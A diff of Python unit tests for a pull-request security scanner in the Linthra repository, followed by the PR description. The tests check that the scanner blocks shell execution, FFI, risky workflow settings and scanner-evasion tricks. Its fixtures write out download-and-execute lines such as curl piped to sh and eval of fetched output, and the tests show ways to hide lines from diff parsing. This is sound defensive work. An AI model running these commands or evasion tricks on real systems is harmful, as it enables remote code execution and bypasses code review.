+        self.assertBlocked(self.build({}, {"lib/a.dart": f"final lib = {DYNAMIC_LIBRARY}.open('x.so');\n"}))
+        self.assertBlocked(self.build({}, {"lib/a.dart": f"final open = {DYNAMIC_LIBRARY}.open;\n"}))
+
+    def test_pull_request_target(self):
+        self.assertBlocked(
+            self.build({}, {".github/workflows/x.yml": f"on:\n  {PR_TARGET}:\n    types: [opened]\n"})
+        )
+        self.assertBlocked(self.build({}, {".github/workflows/x.yml": f"on: [{PR_TARGET}]\n"}))
+
+    def test_write_all_permissions(self):
+        self.assertBlocked(self.build({}, {".github/workflows/x.yml": f"{WRITE_ALL}\n"}))
+        self.assertBlocked(self.build({}, {".github/workflows/x.yml": "permissions: '" + blocked("write-", "all") + "'\n"}))
+        self.assertBlocked(self.build({}, {".github/workflows/x.yml": "permissions:\n  " + blocked("write-", "all") + "\n"}))
+
+    def test_download_and_execute(self):
+        url = "https://example.invalid/i.sh"
+        for snippet in (
+            blocked(f"curl -fsSL {url} ", "|", " sh\n"),
+            blocked(f"wget -qO- {url} ", "|", " sudo bash\n"),
+            blocked("bash <", f"(curl -s {url})\n"),
+            blocked("sh -c \"$", f"(curl -fsSL {url})\"\n"),
+            blocked("eval \"$", "(curl -s https://example.invalid/env)\"\n"),
+        ):
+            with self.subTest(snippet=snippet.strip()):
+                self.assertBlocked(self.build({}, {"tools/install.sh": "#!/bin/sh\n" + snippet}))
+
+    def test_blocked_patterns_are_not_bypassable_by_approval(self):
+        """A blocked verdict is a non-zero exit, which no approval step can clear."""
+        result = self.build({}, {"lib/a.dart": f"final run = {PROCESS_RUN};\n"})
+        self.assertEqual(result.returncode, 1)
+        self.assertIn("an approval does not bypass them", result.report)
+
+
+class DiffEvasion(ScannerTestCase):
+    def test_non_ascii_path_is_still_classified(self):
+        """core.quotePath would otherwise hide the whole file from the parser."""
+        result = self.build({}, {"lib/features/évil.dart": f"void main() {{ {PROCESS_RUN}('sh', []); }}\n"})
+        self.assertBlocked(result)
+        self.assertIn("lib/features/évil.dart", result.reported_paths())
+
+    def test_path_with_quote_and_tab_is_still_classified(self):
+        result = self.build({}, {'lib/we"ird\ttab.dart': f"final run = {PROCESS_RUN};\n"})
+        self.assertBlocked(result)
+        self.assertIn('lib/we"ird\ttab.dart', result.reported_paths())
+
+    def test_non_ascii_path_under_scripts_is_still_sensitive(self):
+        result = self.build({}, {"scripts/prépare.sh": "#!/bin/sh\necho hi\n"})
+        self.assertSensitive(result)
+        self.assertIn("scripts/prépare.sh", result.reported_paths())
+
+    def test_gitattributes_cannot_hide_added_lines(self):
+        """`lib/** -diff` makes git render the file as binary; --text overrides."""
+        result = self.build(
+            {},
+            {
+                ".gitattributes": "lib/** -diff\n",
+                "lib/evil.dart": f"void main() {{ {PROCESS_RUN}('sh', []); }}\n",
+            },
+        )
+        self.assertBlocked(result)
+        self.assertIn("lib/evil.dart", result.reported_paths())
+
+    def test_exotic_line_separator_cannot_split_a_blocked_pattern(self):
+        """\x0b is Dart whitespace but a line boundary to str.splitlines()."""
+        result = self.build({}, {"lib/a.dart": f"final r = {PROCESS_RUN[:8]}\x0b{PROCESS_RUN[8:]};\n"})
+        self.assertBlocked(result)
+
+    def test_added_line_that_looks_like_a_diff_header_cannot_reattribute(self):
+        result = self.build(
+            {"lib/real.dart": "class Real {}\n"},
+            {"lib/real.dart": f"class Real {{}}\n++ b/lib/spoof.dart\nfinal run = {PROCESS_RUN};\n"},
+        )
+        self.assertBlocked(result)
+        self.assertIn("lib/real.dart", result.reported_paths())
+        self.assertNotIn("lib/spoof.dart", result.reported_paths())
+
+
+class FailClosed(ScannerTestCase):
+    def test_unknown_base_revision_fails_closed(self):
+        tmp = Path(tempfile.mkdtemp())
+        self.addCleanup(shutil.rmtree, tmp, True)
+        repo = tmp / "repo"
+        repo.mkdir()
+        _git(repo, "init", "-q", "-b", "main", ".")
+        _git(repo, "config", "user.email", "test@example.invalid")
+        _git(repo, "config", "user.name", "Test")
+        _write(repo, "README.md", "# fixture\n")
+        head_sha = _commit(repo, "base")
+
+        result = self.scan(repo, "0" * 40, head_sha)
+        self.assertEqual(result.returncode, 2, result.stdout + result.stderr)
+        self.assertIn("could not inspect the diff", result.stderr)
+
+    def test_outside_a_git_repository_fails_closed(self):
+        tmp = Path(tempfile.mkdtemp())
+        self.addCleanup(shutil.rmtree, tmp, True)
+        result = self.scan(tmp, "HEAD~1", "HEAD")
+        self.assertEqual(result.returncode, 2, result.stdout + result.stderr)
+
+    def test_unresolvable_diff_path_is_reported_as_sensitive(self):
+        additions = [(scanner.UNKNOWN_PATH, "some line")]
+        sensitive, blocked = scanner.classify([], additions)
+        self.assertTrue(sensitive)
+        self.assertFalse(blocked)
+
+
+class GitPathUnquoting(unittest.TestCase):
+    def test_plain_paths_pass_through(self):
+        self.assertEqual(scanner.unquote_git_path("b/lib/main.dart"), "b/lib/main.dart")
+
+    def test_octal_escapes_decode_to_utf8(self):
+        self.assertEqual(
+            scanner.unquote_git_path('"b/lib/features/\\303\\251vil.dart"'),
+            "b/lib/features/évil.dart",
+        )
+
+    def test_control_and_quote_escapes(self):
+        self.assertEqual(scanner.unquote_git_path('"b/we\\"ird\\ttab.dart"'), 'b/we"ird\ttab.dart')
+
+    def test_backslash_escape(self):
+        self.assertEqual(scanner.unquote_git_path('"b/a\\\\b"'), "b/a\\b")
+
+
+def _workflow() -> dict:
+    try:
+        import yaml
+    except ImportError:  # pragma: no cover - exercised only on hosts without PyYAML
+        raise unittest.SkipTest("PyYAML is not installed")
+    return yaml.safe_load(WORKFLOW.read_text(encoding="utf-8"))
+
+
+def _job() -> dict:
+    return _workflow()["jobs"]["security-surface"]
+
+
+def _step(name: str) -> dict:
+    for step in _job()["steps"]:
+        if step.get("name") == name:
+            return step
+    raise AssertionError(f"workflow step {name!r} not found")
+
+
+class WorkflowInvariants(unittest.TestCase):
+    def test_permissions_are_read_only(self):
+        workflow = _workflow()
+        self.assertEqual(workflow["permissions"], {"contents": "read", "pull-requests": "read"})
+        self.assertNotIn("permissions", _job())
+
+    def test_workflow_is_not_triggered_by_pull_request_target(self):
+        # PyYAML parses a bare `on:` key as the boolean True.
+        triggers = _workflow()[True]
+        self.assertEqual(set(triggers), {"pull_request", "pull_request_review"})
+
+    def test_no_repository_secrets_are_referenced(self):
+        self.assertNotIn("secrets.", WORKFLOW.read_text(encoding="utf-8"))
+
+    def test_pr_controlled_values_are_passed_through_env_not_interpolated_into_shell(self):
+        for step in _job()["steps"]:
+            script = step.get("run", "")
+            self.assertNotIn("github.event.pull_request", script, step.get("name"))
+            self.assertNotIn("github.event.review", script, step.get("name"))
+
+    def test_review_lookup_is_paginated(self):
+        script = _step("Require owner approval for sensitive external PR")["run"]
+        self.assertIn("gh api --paginate", script)
+
+    def test_checkout_does_not_persist_credentials(self):
+        self.assertIs(_step("Checkout PR head")["with"]["persist-credentials"], False)
+
+
+class ReviewDecisionFilter(unittest.TestCase):
+    """Exercise the jq filter the workflow uses, straight out of the workflow."""
+
+    OWNER = "TheZupZup"
+    HEAD = "a" * 40
+    OLD = "b" * 40
+
+    @classmethod
+    def setUpClass(cls):
+        if shutil.which("jq") is None:  # pragma: no cover - exercised only without jq
+            raise unittest.SkipTest("jq is not installed")
+        cls.filter = _job()["env"]["REVIEW_DECISION_JQ"]
+
+    def decide(self, reviews: list[dict], head: str | None = None) -> str:
+        result = subprocess.run(
+            [
+                "jq",
+                "-r",
+                "--arg",
+                "owner",
+                self.OWNER,
+                "--arg",
+                "head",
+                head or self.HEAD,
+                self.filter,
+            ],
+            input=json.dumps(reviews),
+            text=True,
+            check=True,
+            stdout=subprocess.PIPE,
+        )
+        return result.stdout.strip()
+
+    @staticmethod
+    def review(state: str, *, user: str = "TheZupZup", commit: str = "a" * 40, at: str = "2026-01-01T00:00:00Z", rid: int = 1) -> dict:
+        return {"id": rid, "user": {"login": user}, "commit_id": commit, "state": state, "submitted_at": at}
+
+    def test_external_pr_without_approval(self):
+        self.assertEqual(self.decide([]), "")
+
+    def test_approval_on_current_head(self):
+        self.assertEqual(self.decide([self.review("APPROVED")]), "APPROVED")
+
+    def test_approval_on_an_old_head_does_not_count(self):
+        self.assertEqual(self.decide([self.review("APPROVED", commit=self.OLD)]), "")
+
+    def test_a_new_push_invalidates_the_previous_approval(self):
+        approved_old = [self.review("APPROVED", commit=self.OLD, rid=1)]
+        self.assertEqual(self.decide(approved_old, head=self.OLD), "APPROVED")
+        self.assertEqual(self.decide(approved_old, head=self.HEAD), "")
+
+    def test_comment_only_review_does_not_revoke_approval(self):
+        reviews = [
+            self.review("APPROVED", at="2026-01-01T00:00:00Z", rid=1),
+            self.review("COMMENTED", at="2026-01-02T00:00:00Z", rid=2),
+        ]
+        self.assertEqual(self.decide(reviews), "APPROVED")
+
+    def test_changes_requested_after_approval_wins(self):
+        reviews = [
+            self.review("APPROVED", at="2026-01-01T00:00:00Z", rid=1),
+            self.review("CHANGES_REQUESTED", at="2026-01-02T00:00:00Z", rid=2),
+        ]
+        self.assertEqual(self.decide(reviews), "CHANGES_REQUESTED")
+
+    def test_dismissal_after_approval_requires_re_approval(self):
+        reviews = [
+            self.review("APPROVED", at="2026-01-01T00:00:00Z", rid=1),
+            self.review("DISMISSED", at="2026-01-02T00:00:00Z", rid=2),
+        ]
+        self.assertEqual(self.decide(reviews), "DISMISSED")
+
+        reviews.append(self.review("APPROVED", at="2026-01-03T00:00:00Z", rid=3))
+        self.assertEqual(self.decide(reviews), "APPROVED")
+
+    def test_non_owner_approval_does_not_count(self):
+        self.assertEqual(self.decide([self.review("APPROVED", user="contributor")]), "")
+
+    def test_identical_timestamps_fall_back_to_review_id(self):
+        same = "2026-01-01T00:00:00Z"
+        reviews = [
+            self.review("APPROVED", at=same, rid=10),
+            self.review("CHANGES_REQUESTED", at=same, rid=11),
+        ]
+        self.assertEqual(self.decide(reviews), "CHANGES_REQUESTED")
+
+    def test_a_later_page_of_reviews_outranks_an_earlier_approval(self):
+        """What --paginate exists for: page 2 must be able to revoke page 1."""
+        page_one = [self.review("APPROVED", at="2026-01-01T00:00:00Z", rid=1)]
+        page_two = [self.review("CHANGES_REQUESTED", at="2026-02-01T00:00:00Z", rid=101)]
+        self.assertEqual(self.decide(page_one), "APPROVED")
+        self.assertEqual(self.decide(page_one + page_two), "CHANGES_REQUESTED")
+
+    def test_missing_user_object_is_tolerated(self):
+        ghost = {"id": 1, "user": None, "commit_id": self.HEAD, "state": "APPROVED", "submitted_at": "2026-01-01T00:00:00Z"}
+        self.assertEqual(self.decide([ghost]), "")
+
+
+class TrustedScannerLoader(unittest.TestCase):
+    """Run the workflow's 'Load trusted scanner' script against real git repos."""
+
+    OWNER = "TheZupZup"
+    REPO = "TheZupZup/Linthra"
+    SCANNER_PATH = "scripts/check_pr_security_surface.py"
+
+    def setUp(self):
+        self.script = _step("Load trusted scanner")["run"]
+
+    def _repo(self, base_has_scanner: bool, head_has_scanner: bool = True) -> tuple[Path, str]:
+        tmp = Path(tempfile.mkdtemp())
+        self.addCleanup(shutil.rmtree, tmp, True)
+        repo = tmp / "repo"
+        repo.mkdir()
+        _git(repo, "init", "-q", "-b", "main", ".")
+        _git(repo, "config", "user.email", "test@example.invalid")
+        _git(repo, "config", "user.name", "Test")
+        _write(repo, "README.md", "# fixture\n")
+        if base_has_scanner:
+            _write(repo, self.SCANNER_PATH, "# trusted base scanner\n")
+        base_sha = _commit(repo, "base")
+        if head_has_scanner:
+            _write(repo, self.SCANNER_PATH, "# contributor head scanner\n")
+            _commit(repo, "head")
+        return repo, base_sha
+
+    def run_loader(self, repo: Path, base_sha: str, *, author: str, head_repo: str | None = None) -> tuple[int, str, str]:
+        runner_temp = Path(tempfile.mkdtemp())
+        self.addCleanup(shutil.rmtree, runner_temp, True)
+        result = subprocess.run(
+            ["bash", "-c", self.script],
+            cwd=repo,
+            text=True,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.STDOUT,
+            env={
+                **os.environ,
+                "GIT_CONFIG_GLOBAL": os.devnull,
+                "GIT_CONFIG_SYSTEM": os.devnull,
+                "RUNNER_TEMP": str(runner_temp),
+                "BASE_SHA": base_sha,
+                "PR_AUTHOR": author,
+                "REPO_OWNER": self.OWNER,
+                "HEAD_REPO": head_repo if head_repo is not None else self.REPO,
+                "GITHUB_REPOSITORY": self.REPO,
+                "SCANNER_PATH": self.SCANNER_PATH,
+            },
+        )
+        loaded = runner_temp / "check_pr_security_surface.py"
+        return result.returncode, result.stdout, loaded.read_text(encoding="utf-8") if loaded.exists() else ""
+
+    def test_external_pr_uses_the_trusted_base_scanner(self):
+        repo, base_sha = self._repo(base_has_scanner=True)
+        code, log, loaded = self.run_loader(repo, base_sha, author="contributor")
+        self.assertEqual(code, 0, log)
+        self.assertEqual(loaded, "# trusted base scanner\n")
+
+    def test_owner_pr_also_uses_the_trusted_base_scanner_when_it_exists(self):
+        repo, base_sha = self._repo(base_has_scanner=True)
+        code, log, loaded = self.run_loader(repo, base_sha, author=self.OWNER)
+        self.assertEqual(code, 0, log)
+        self.assertEqual(loaded, "# trusted base scanner\n")
+
+    def test_external_pr_fails_closed_when_the_base_scanner_is_missing(self):
+        repo, base_sha = self._repo(base_has_scanner=False)
+        code, log, loaded = self.run_loader(repo, base_sha, author="contributor")
+        self.assertEqual(code, 1, log)
+        self.assertIn("Refusing to execute the contributor-supplied scanner", log)
+        self.assertEqual(loaded, "")
+
+    def test_owner_bootstrap_may_use_the_head_scanner(self):
+        repo, base_sha = self._repo(base_has_scanner=False)
+        code, log, loaded = self.run_loader(repo, base_sha, author=self.OWNER)
+        self.assertEqual(code, 0, log)
+        self.assertIn("Bootstrap", log)
+        self.assertEqual(loaded, "# contributor head scanner\n")
+
+    def test_bootstrap_is_refused_for_an_owner_pr_from_a_fork(self):
+        repo, base_sha = self._repo(base_has_scanner=False)
+        code, log, loaded = self.run_loader(repo, base_sha, author=self.OWNER, head_repo="someone-else/Linthra")
+        self.assertEqual(code, 1, log)
+        self.assertEqual(loaded, "")
+
+    def test_missing_base_commit_fails_closed(self):
+        repo, _ = self._repo(base_has_scanner=True)
+        code, log, loaded = self.run_loader(repo, "0" * 40, author=self.OWNER)
+        self.assertEqual(code, 1, log)
+        self.assertIn("unavailable", log)
+        self.assertEqual(loaded, "")
+
+
+class GuardSelfSafety(unittest.TestCase):
+    """The guard must not hard-block a PR that edits the guard.
+
+    Blocked rules match added lines in any file, so the guard's own sources —
+    which necessarily describe the patterns they reject — have to be written so
+    that no rule matches them. That is what `_split_literal` in the scanner and
+    `blocked()` here are for, and this test is what keeps it true: without it a
+    future contributor could add one contiguous literal and make every PR
+    touching the guard unmergeable.
+    """
+
+    SOURCES = (
+        SCANNER,
+        WORKFLOW,
+        ROOT / ".github" / "workflows" / "pr-security-review-tests.yml",
+        Path(__file__).resolve(),
+    )
+
+    def test_guard_sources_do_not_trip_their_own_blocked_rules(self):
+        for source in self.SOURCES:
+            for number, line in enumerate(source.read_text(encoding="utf-8").splitlines(), 1):
+                for pattern, reason in scanner.BLOCKED_ADDITION_RULES:
+                    self.assertIsNone(
+                        pattern.search(line),
+                        f"{source.relative_to(ROOT)}:{number} trips the {reason!r} rule: {line.strip()}",
+                    )
+
+    def test_assembled_fixtures_are_the_literals_they_claim_to_be(self):
+        """The split fixtures must still be the exact patterns under test."""
+        self.assertEqual(PROCESS_RUN, "Process" ".run")
+        self.assertEqual(RUN_IN_SHELL, "runIn" "Shell")
+        self.assertEqual(DART_FFI, "dart:" "ffi")
+        self.assertEqual(DYNAMIC_LIBRARY, "Dynamic" "Library")
+        self.assertEqual(PR_TARGET, "pull_request" "_target")
+        self.assertEqual(WRITE_ALL, "permissions: " "write-all")
+
+    def test_every_blocked_rule_matches_its_own_reason_free_fixture(self):
+        """Guards against a fragment split that quietly breaks a rule."""
+        matched = set()
+        for fixture in (
+            f"{PROCESS_RUN}('sh', [])",
+            f"{PROCESS_START}('sh')",
+            f"'{RUN_IN_SHELL}': true",
+            f"import '{DART_FFI}';",
+            f"{DYNAMIC_LIBRARY}.open('x')",
+            f"on: [{PR_TARGET}]",
+            WRITE_ALL,
+            blocked("curl -s https://example.invalid ", "|", " bash"),
+        ):
+            for pattern, reason in scanner.BLOCKED_ADDITION_RULES:
+                if pattern.search(fixture):
+                    matched.add(reason)
+        self.assertEqual(len(matched), len(scanner.BLOCKED_ADDITION_RULES))
+
+
+class RealRepositoryScanner(unittest.TestCase):
+    """The scanner Linthra actually ships must at least be runnable."""
+
+    def test_scanner_reports_usage_without_arguments(self):
+        result = subprocess.run(
+            [sys.executable, str(SCANNER)],
+            text=True,
+            stdout=subprocess.PIPE,
+            stderr=subprocess.PIPE,
+        )
+        self.assertNotEqual(result.returncode, 0)
+        self.assertIn("--base", result.stderr)
+
+
+if __name__ == "__main__":
+    unittest.main(verbosity=2)

--- a/test/tooling/check_pr_security_surface_test.py
+++ b/test/tooling/check_pr_security_surface_test.py
@@ -347,6 +347,23 @@ class AndroidSecurityPolicyPaths(ScannerTestCase):
                 self.assertSensitive(self.build({path: "<a/>\n"}, {path: "<b/>\n"}))
 
 
+class PlatformSourcePaths(ScannerTestCase):
+    """Kotlin under android/ ships in every release APK."""
+
+    KOTLIN = "android/app/src/main/kotlin/io/github/thezupzup/linthra/"
+
+    def test_android_kotlin_is_sensitive(self):
+        for name in ("MediaArtworkFileProvider.kt", "SafDocumentScanner.kt", "ShareChannel.kt"):
+            with self.subTest(name):
+                path = self.KOTLIN + name
+                self.assertSensitive(self.build({path: "class A\n"}, {path: "class B\n"}))
+
+    def test_android_resources_stay_ordinary(self):
+        """Only source and policy files, not every android/ asset."""
+        path = "android/app/src/main/res/drawable/ic_launcher.xml"
+        self.assertOrdinary(self.build({}, {path: "<vector/>\n"}))
+
+
 class NativeAndCargoPaths(ScannerTestCase):
     """CI compiles native/ and runs the Rust core from it."""
 
@@ -658,6 +675,22 @@ class DownloadThenExecute(ScannerTestCase):
     def test_download_without_execution_is_not_blocked(self):
         script = f"#!/bin/sh\nwget -q {self.URL}/archive.tar.gz\ntar xf archive.tar.gz\n"
         self.assertOrdinary(self.build({}, {"packaging/bf.sh": script}))
+
+    def test_backslash_continuation_at_every_position(self):
+        """A command may break at any point where a space is legal."""
+        cases = {
+            "before the flag": f"curl -fsSL {self.URL} \\\n  -o /tmp/i && ",
+            "between flag and target": f"curl -fsSL {self.URL} -o \\\n  /tmp/i && ",
+            "before the interpreter": f"curl -fsSL {self.URL} -o /tmp/i && \\\n  ",
+        }
+        for name, prefix in cases.items():
+            with self.subTest(name):
+                script = blocked("#!/bin/sh\n" + prefix, "sh", " /tmp/i\n")
+                self.assertBlocked(self.build({}, {"packaging/k.sh": script}))
+
+    def test_continuation_between_interpreter_and_its_argument(self):
+        script = blocked(f"#!/bin/sh\ncurl -fsSL {self.URL} -o /tmp/i && ", "sh", " \\\n  /tmp/i\n")
+        self.assertBlocked(self.build({}, {"packaging/l.sh": script}))
 
     def test_executed_file_only_sharing_a_prefix_is_not_blocked(self):
         """`/tmp/data` and `/tmp/data-cleanup.sh` are different files."""


### PR DESCRIPTION
## Summary

Add a dedicated **PR Security Surface Guard** on top of Linthra's existing secret/privacy scan.

The current `scripts/check_secrets.sh` is good at catching accidentally committed secrets, private keys, keystores, tokens, and private diagnostics data. This PR adds the missing behavioral layer: detect when a PR crosses a sensitive trust boundary and require an explicit maintainer security review before an external contribution can pass.

## What the guard does

- classifies changes to CI/workflows, automation scripts, dependency/build files, auth/session/credential code, network/provider code, persistence/storage code, Android permissions/build config, and native Linux code as security-sensitive
- also detects sensitive added behavior such as new network clients, filesystem writes, secure/local persistence, platform channels, credential logic, and database migrations
- requires **TheZupZup to APPROVE the exact current HEAD** of a security-sensitive external PR
- invalidates that approval automatically when the contributor pushes a new commit; the new HEAD must be reviewed again
- reruns when a PR review is submitted or dismissed so the gate updates without asking contributors to make a dummy commit
- ordinary UI/tests/docs PRs pass without extra maintainer ceremony

## Hard blockers

A small set of unusually powerful additions are rejected rather than being bypassable by approval:

- Dart runtime process/shell execution (`Process.run/start`, `runInShell: true`)
- runtime FFI / dynamic library loading
- `pull_request_target`
- GitHub Actions `write-all`
- download-and-execute shell patterns such as `curl ... | sh`

If Linthra ever genuinely needs one of these capabilities, it should be introduced as a separate maintainer-controlled design change rather than quietly riding inside an unrelated contributor PR.

## Important anti-bypass property

The workflow **does not execute the scanner from the contributor's PR head**. It loads `scripts/check_pr_security_surface.py` from the PR's trusted base commit and uses that copy to inspect the untrusted diff. This prevents a PR from weakening the scanner in the same change it is trying to pass.

The workflow itself uses only:

```yaml
permissions:
  contents: read
  pull-requests: read
```

No repository secrets are exposed and no write permission is granted, so it is safe for fork PRs.

## Existing protections kept

This does not replace the existing `Secret & privacy scan`; it complements it. Existing Flutter checks, release/dependency/toolchain guards, F-Droid/release hygiene, and secret scanning are unchanged.

## Rollout note

Because this PR introduces the new workflow and trusted scanner for the first time, the new security workflow cannot protect this PR itself from `main`; GitHub evaluates PR workflows from the base branch. Existing CI still applies here. Once merged, future PRs will use the guard from trusted `main`.